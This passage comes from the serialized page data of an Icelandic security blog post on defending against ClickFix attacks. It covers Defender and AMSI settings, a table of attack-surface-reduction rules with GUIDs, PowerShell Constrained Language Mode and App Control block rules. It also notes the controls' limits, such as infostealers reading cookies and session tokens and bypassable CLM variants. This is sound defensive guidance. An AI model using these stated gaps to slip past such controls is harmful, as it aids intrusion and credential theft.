verja credentials og knýja fram least privilege. Takmörkin: þær afmarka hvað gerist eftir innbrot. Þær hindra ekki infostealer í notandasamhenginu í að lesa cookies, session tokens og app-credential-stores sem notandinn hefur aðgang að.",[525,902,903],{},"Þá að Microsoft Defender. Defender AV getur greint payload annars þreps, en aðeins með réttum stillingum: kveiktu á Cloud Protection og stilltu varnarstigið á High eða High+. AMSI, Antimalware Scan Interface, gerir forritum kleift að afhenda Defender efni til skoðunar á keyrslutíma, eftir að það hefur verið afkóðað eða afobfuskað í minninu, en áður en það er keyrt. PowerShell notar AMSI til að bera kennsl á skaðkóða, og AMSI þarf rauntímavörn og behavior monitoring.",[525,905,906],{},"Að minnsta kosti fimm attack-surface-reduction-reglur skipta máli gegn ClickFix:",[589,908,910],{"style":909},"margin: 0.5rem 0 2rem; overflow-x: auto",[911,912,826,914,826,933],"table",{"style":913},"width:100%; border-collapse: collapse; font-size: 0.85rem",[915,916,917,918,826],"thead",{},"\n    ",[919,920,921,922,921,927,921,930,917],"tr",{},"\n      ",[923,924,926],"th",{"style":925},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Regla",[923,928,929],{"style":925},"GUID",[923,931,932],{"style":925},"ClickFix-vægi",[934,935,917,936,917,952,917,967,917,980,917,993,826],"tbody",{},[919,937,921,938,921,943,921,949,917],{},[939,940,942],"td",{"style":941},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Loka á keyrslu mögulega dulbúinna skripta",[939,944,946],{"style":945},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[572,947,948],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[939,950,951],{"style":941},"Dulbúin eða kóðuð skript á keyrslu- og evasion-fasanum",[919,953,921,954,921,958,921,964,917],{},[939,955,957],{"style":956},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Hindra JavaScript eða VBScript í að ræsa niðurhalað keyranlegt efni",[939,959,961],{"style":960},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[572,962,963],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[939,965,966],{"style":956},"WSH, .js eða .vbs sem ræsa niðurhöluð payload",[919,968,921,969,921,972,921,977,917],{},[939,970,971],{"style":941},"Leyfa keyranlegar skrár aðeins uppfylli þær skilyrði um útbreiðslu, aldur eða trusted list",[939,973,974],{"style":945},[572,975,976],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[939,978,979],{"style":941},"Nýlegar eða sjaldgæfar executables sem eru lagðar niður",[919,981,921,982,921,985,921,990,917],{},[939,983,984],{"style":956},"Loka á keyranlegt efni úr póstforriti og webmail",[939,986,987],{"style":960},[572,988,989],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[939,991,992],{"style":956},"ClickFix-afbrigði afhent með tölvupósti",[919,994,921,995,921,998,921,1003,917],{},[939,996,997],{"style":941},"Hindra öll Office-forrit í að búa til barnaferli",[939,999,1000],{"style":945},[572,1001,1002],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[939,1004,1005],{"style":941},"Office-beituafbrigði sem ræsa interpreters",[525,1007,1008],{},"Rúllaðu ASR fyrst út í audit-ham, svo sem pilot, svo í block-ham. Tamper Protection er síðasta línan: hún hindrar árásaraðilann í að slökkva á greiningunum þínum.",[525,1010,1011],{},"Hjá PowerShell sjálfu dregur þú úr áhættunni af legacy-interpreterum. Auðkenndu og fjarlægðu, þar sem það er gerlegt, Windows PowerShell 2.0 og legacy-VBScript-einingar sem vantar logging- og security-eiginleika nýrri útgáfa. Næsta skref er Constrained Language Mode (CLM), sem takmarkar þær máleiningar PowerShell sem eru í boði og lokar á margar skriptubundnar aðferðir. CLM hefur aðeins traust öryggisgildi ef system-application-control-policy knýr hann fram (App Control for Business); afbrigðin um umhverfisbreytu og AppLocker eru veikari og hægt að komast fram hjá þeim. Og mörg kerfi þurfa Full Language Mode til að virka, til dæmis software-deployment-tooling, og þess vegna er CLM oft aðeins gerlegur í völdum umhverfum.",[525,1013,1014],{},"Þar með erum við komin að App Control for Business (áður WDAC). App Control knýr fram code-integrity-policy um það hvaða executables, skript og reklar mega keyra. Stefnumótandi afstaðan er default-deny auk Block Rules sem Microsoft mælir með, þekkta LOLBin- og bypass-loklistans. App Control er líka rétta enforcement-leiðin fyrir PowerShell-CLM. Script enforcement lokar á MSHTA- og MSXML-skripthosta, þvingar PowerShell í CLM og lokar á óleyfilega notkun Windows Script Host. Nokkrar staðreyndir um hegðunina skipta máli:",[823,1016,826,1017,826,1020,826,1023],{"style":825},[828,1018,1019],{},"Base policies sem treysta Windows loka ekki sjálfkrafa á treyst LOLBin. Þú verður að merga inn Block Rules sem Microsoft mælir með til að loka þekktu bypössunum.",[828,1021,1022],{},"App Control hindrar ekki undirritað powershell.exe eða cmd.exe í að ræsast. Það takmarkar hvað þau mega gera (CLM, ekkert óundirritað eða óleyfilegt payload) og stýrir ekki innihaldi cmd.exe, .bat eða .cmd. Þess vegna er því lagskipt með ASR og ræsingarherðingu, ekki beitt eitt og sér.",[828,1024,1025],{},"Audit-hamurinn er ekki hlutlaus: script enforcement lokar líka í audit á keyrslu MSHTA og MSXML og getur breytt PowerShell-CLM-hegðuninni. Þess vegna verður App Control í audit að vera afmarkað við pilot eða hringi frá fyrstu útrúllun, aldrei yfir allan flotann.",[525,1027,1028],{},"App Control er sú staka stýring sem hefur hæsta confidence gegn interpreter-, LOLBin- og payload-keyrslufösunum og knýr fram trausta CLM. Um leið ber hún mesta deployment-flækjustigið og hæstu rollback-áhættuna, því röng stilling lokar á keyrslu. Innleiddu hana um stýrða pilot-hringi.",[551,1030,1032],{"id":1031},"hvar-við-komum-inn-í-myndina","Hvar við komum inn í myndina",[525,1034,557],{},[525,1036,1037,1038,1042],{},"ClickFix er hratt, og innbyggðar greiningar Microsoft ná yfir mest af því, en ekki allt. Fyrir CSOC-viðskiptavini okkar víkkum við þekjuna jafnt og þétt þar sem glufur koma í ljós: keyrsla um Windows Terminal, RAT-knúin stuðningssvik og hegðun eftir innbrot. Viltu vita hvar umhverfið þitt stendur, ",[1039,1040,1041],"a",{"href":276},"hafðu þá samband",".",[1044,1045,1046],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":529,"searchDepth":530,"depth":530,"links":1048},[1049,1050,1051,1052,1053,1054,1055,1056,1057],{"id":553,"depth":530,"text":554},{"id":635,"depth":530,"text":636},{"id":647,"depth":530,"text":648},{"id":670,"depth":530,"text":671},{"id":782,"depth":530,"text":783},{"id":812,"depth":530,"text":813},{"id":849,"depth":530,"text":850},{"id":865,"depth":530,"text":866},{"id":1031,"depth":530,"text":1032},"post",{"lang":1060,"seoTitle":1061,"titleClass":1062,"date":1063,"categories":1064,"blogtitlepic":1065,"socialimg":1066,"customExcerpt":1067,"keywords":1068,"asideNav":1069,"published":325},"is","Að greina og koma í veg fyrir ClickFix-árásir: Win+R-paste-brellan","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix gerir notendur að sínum eigin árásaraðila: falsað CAPTCHA, eitt copy-paste, og skaðkóði keyrir í minninu án þess að neitt lendi á disknum. Hvernig Microsoft Defender greinir árásina, hvar greiningin rekst á takmörk og hvernig þú lokar glufunni með RunMRU-hunt og fjórum varnarlögum.","ClickFix, ClickFix árás, ClickFix greining, koma í veg fyrir ClickFix, falsað CAPTCHA, Win+R árás, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR reglur, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, Infostealer, LOLBin, PowerShell herðing",{"menuItems":1070},[1071,1074,1077,1080,1083,1086,1089,1092,1095],{"href":1072,"text":1073},"#clickfix-árásarkeðjan","Árásarkeðjan",{"href":1075,"text":1076},"#hvað-microsoft-defender-greinir","Hvað Defender greinir",{"href":1078,"text":1079},"#hvar-innbyggða-greiningin-rekst-á-takmörk-sín","Hvar það strandar",{"href":1081,"text":1082},"#að-loka-glufunni-runmru-hunt","Að loka glufunni",{"href":1084,"text":1085},"#varnarlag-1-loka-á-afhendinguna","Lag 1: afhending",{"href":1087,"text":1088},"#varnarlag-2-loka-á-brelluna","Lag 2: brellan",{"href":1090,"text":1091},"#varnarlag-3-loka-á-aðgerðina","Lag 3: aðgerðin",{"href":1093,"text":1094},"#varnarlag-4-loka-á-keyrsluna","Lag 4: keyrsla",{"href":1096,"text":1032},"#hvar-við-komum-inn-í-myndina","/posts/2026-09-21-clickfix-prevent-detect",{"title":545,"description":529},"posts/2026-09-21-clickfix-prevent-detect",[1101,1102,1103],"Defender","SOC","Endpoint Security","Wr6qNAIi3GD6K8C4tENM8di57MCWaijVV5-tIHdxyts",[],{"id":1107,"extension":1108,"meta":1109,"stem":8,"__hash__":1120},"authors_data/authors.json","json",{"Fritz Zurhorst":1110,"Nadine Klein":1115},{"display_name":520,"avatar":1111,"permalink":1112,"linkedin":1113,"imageOffsetTop":1114},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":547,"avatar":1116,"permalink":1117,"twitter":1118,"linkedin":1119,"imageOffsetTop":1114},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383968802]